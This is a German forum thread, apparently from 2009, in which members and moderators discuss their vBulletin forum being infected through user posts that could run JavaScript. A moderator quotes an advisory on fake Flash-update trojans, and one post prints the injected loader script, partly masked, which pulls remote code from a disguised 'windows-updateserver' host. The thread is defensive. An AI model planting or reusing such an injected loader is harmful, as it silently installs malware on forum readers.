Ergebnis 1 bis 15 von 42

Thema: Forum infiziert!

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Registriert seit
    23.04.2003
    Beiträge
    807
    Zitat Zitat von Firefighter Heiti Beitrag anzeigen
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
    Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
    Code:
    {script}
    Hier Schadcode nach wahl
    {/script}
    benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier

    EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

  2. #2
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

  3. #3
    Registriert seit
    06.08.2005
    Beiträge
    3.336
    Zitat Zitat von bastelheini Beitrag anzeigen
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
    Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.

    Ist aber nun alles deaktiviert.
    Schöne Grüße,
    abc-truppe
    Mod-Team
    (Kleinanzeigen, Off-Topic)

  4. #4
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso:)

    kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?

  5. #5
    Registriert seit
    06.08.2005
    Beiträge
    3.336
    Daran wird derzeit gerade gearbeitet :)
    Backdraft ist schon dran!
    Schöne Grüße,
    abc-truppe
    Mod-Team
    (Kleinanzeigen, Off-Topic)

  6. #6
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso:)


    gut dann hör ich auf mit nerven:D

  7. #7
    Registriert seit
    10.12.2001
    Beiträge
    2.273
    21. Juli 2009

    Wir erhalten in letzter Zeit vermehrt Hinweise, dass sich Benutzer in Foren registrieren und Javaskript-Code in ihre Beiträge schreiben. Ziel dabei ist, dass Leser dieser Beiträge aufgefordert werden, angebliche Browser-Plug-in-Updates (z.B. von Flash) zu installieren und dazu auf täuschend echt aussehende Herstellerseiten weitergeleitet werden. Dabei wird dann kein Update, sondern ein Trojaner installiert.
    Ein auffälliger Benutzername, der solche Beiträge in letzter Zeit schreibt, ist AnaJu.

    Erfolgreich ist dieser Angriff nur, wenn Benutzern erlaubt ist, HTML-Code im Forum zu speichern.
    vBulletin ist standardmäßig so konfiguriert, dass von Benutzern eingegebener HTML-Code nicht ausgeführt wird und diese Art von Angriff auf Ihre Benutzer somit wirkungslos ist.

    Wenn Sie nicht sicher sind, ob HTML-Code erlaubt ist oder nicht, sollten Sie die folgenden Einstellungen überprüfen:

    vBulletin-Einstellungen -> Benutzer: Notizen

    vBulletin-Einstellungen -> Texte: BB-Code

    vBulletin-Einstellungen -> Benutzer: Private Nachrichten

    vBulletin-Einstellungen -> Projektverwaltung (falls vorhanden)

    Foren & Moderatoren -> Foren verwalten -> Alle Foren überprüfen

    Kalender -> Kalender verwalten -> Alle Kalender überprüfen

    Benutzergruppen -> Benutzergruppen verwalten -> Signaturen und Blog (falls vorhanden)



    Ihr vBulletin-Germany Team
    Also wie gesagt, HTML ist komplett deaktiviert. Ob es für einzelne Gruppen schaltbar wird, weiß ich noch nicht.
    Grüße Chris

    Das Drama aller Zeiten hat eigentlich nur ein einziges Thema gehabt: die Unfähigkeit der Menschen, miteinander zu leben. Zitat von Gerhard Bronner

  8. #8
    Registriert seit
    01.08.2002
    Beiträge
    594
    Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:


    XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")


    (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)

    Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.

  9. #9
    Registriert seit
    01.08.2007
    Beiträge
    557
    Zitat Zitat von Pipsi Beitrag anzeigen
    Würde mich interessieren, was er damit bezwecken will....
    Ein BOT-Netz aufbauen :)

    hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.

    Zitat Zitat von getreu dem Motto
    "Von Adobe, das kann ja nicht falsch sein."

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •